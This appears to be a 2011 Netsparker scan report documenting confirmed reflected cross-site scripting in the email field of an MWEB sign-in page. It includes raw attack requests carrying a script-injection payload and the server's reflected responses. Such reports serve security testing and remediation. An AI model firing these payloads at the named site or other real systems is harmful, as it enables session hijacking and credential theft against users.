XSS, Cross Site Scripting in www.signmein.co.za, CWE-79, CAPEC-86Loading
Netsparker - Scan Report Summary
|
||||||||||
|
Total RequestsAverage Speedreq/sec. |
10
identified
7
confirmed
0
critical
1
informational
|
||||||||
GHDB, DORK TestsGHDB, DORK Tests
|
||||||||||
|
Authentication
Scheduled
|
|||||||||
VULNERABILITIESVulnerabilities
|
||
 |
IMPORTANT
60 %
LOW
30 %
INFORMATION
10 %
|
|
Cross-site Scripting
Cross-site Scripting
5
TOTAL
IMPORTANT
CONFIRMED
5
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /authentication.aspx
/authentication.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| __EVENTTARGET | POST | 3 |
| __EVENTARGUMENT | POST | 3 |
| __VIEWSTATE | POST | /wEPDwUIOTgwMTMwMzhkZHWmTRgiVO MJYlgiy6PMKVGAQqc |
| __EVENTVALIDATION | POST | /wEWBgKp78XzAgL71YatCgKVg63aCAKyn FkAp7Vg EEArqY7psI8A qtvcn NThUQn3khS6hPha0NU= |
| m_emailAddress | POST | '"--></style></script><script>alert(0x000CB0)</script> |
| m_password | POST | 3 |
| m_rememberMe | POST | true |
| m_submitButton | POST | SIGN IN |
| m_failedCount | POST | 3 |
| m_authType | POST | 3 |
Request
POST /authentication.aspx HTTP/1.1
Referer: http://www.signmein.co.za/authentication.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.signmein.co.za
Content-Length: 393
Accept-Encoding: gzip, deflate
__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&m_emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000CB0)%3c%2fscript%3e&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN&m_failedCount=3&m_authType=3
Referer: http://www.signmein.co.za/authentication.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.signmein.co.za
Content-Length: 393
Accept-Encoding: gzip, deflate
__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&m_emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000CB0)%3c%2fscript%3e&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN&m_failedCount=3&m_authType=3
Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:21:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17574
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Invalid email address: '"--></style></script><script>netsparker(0x000cb0)</script></span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" value="'"--></style></script><script>netsparker(0x000CB0)</script>" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" value="3" />
<input name="m_authType" type="hidden" id="m_authType" value="3" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidato..
Date: Mon, 21 Mar 2011 17:21:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17574
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Invalid email address: '"--></style></script><script>netsparker(0x000cb0)</script></span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" value="'"--></style></script><script>netsparker(0x000CB0)</script>" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" value="3" />
<input name="m_authType" type="hidden" id="m_authType" value="3" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidato..
|
- /authentication.aspx
/authentication.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| __EVENTARGUMENT | GET | 3 |
| __EVENTTARGET | GET | 3 |
| __EVENTVALIDATION | GET | /wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU= |
| __VIEWSTATE | GET | /wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc |
| m_authType | GET | 3 |
| m_emailAddress | GET | '"--></style></script><script>alert(0x000CE1)</script> |
| m_failedCount | GET | 3 |
| m_password | GET | 3 |
| m_rememberMe | GET | true |
| m_submitButton | GET | SIGN IN |
Request
GET /authentication.aspx?__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&m_authType=3&m_emailAddress='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000CE1)%3C/script%3E&m_failedCount=3&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN HTTP/1.1
Referer: http://www.signmein.co.za/authentication.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
Referer: http://www.signmein.co.za/authentication.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:21:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17778
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
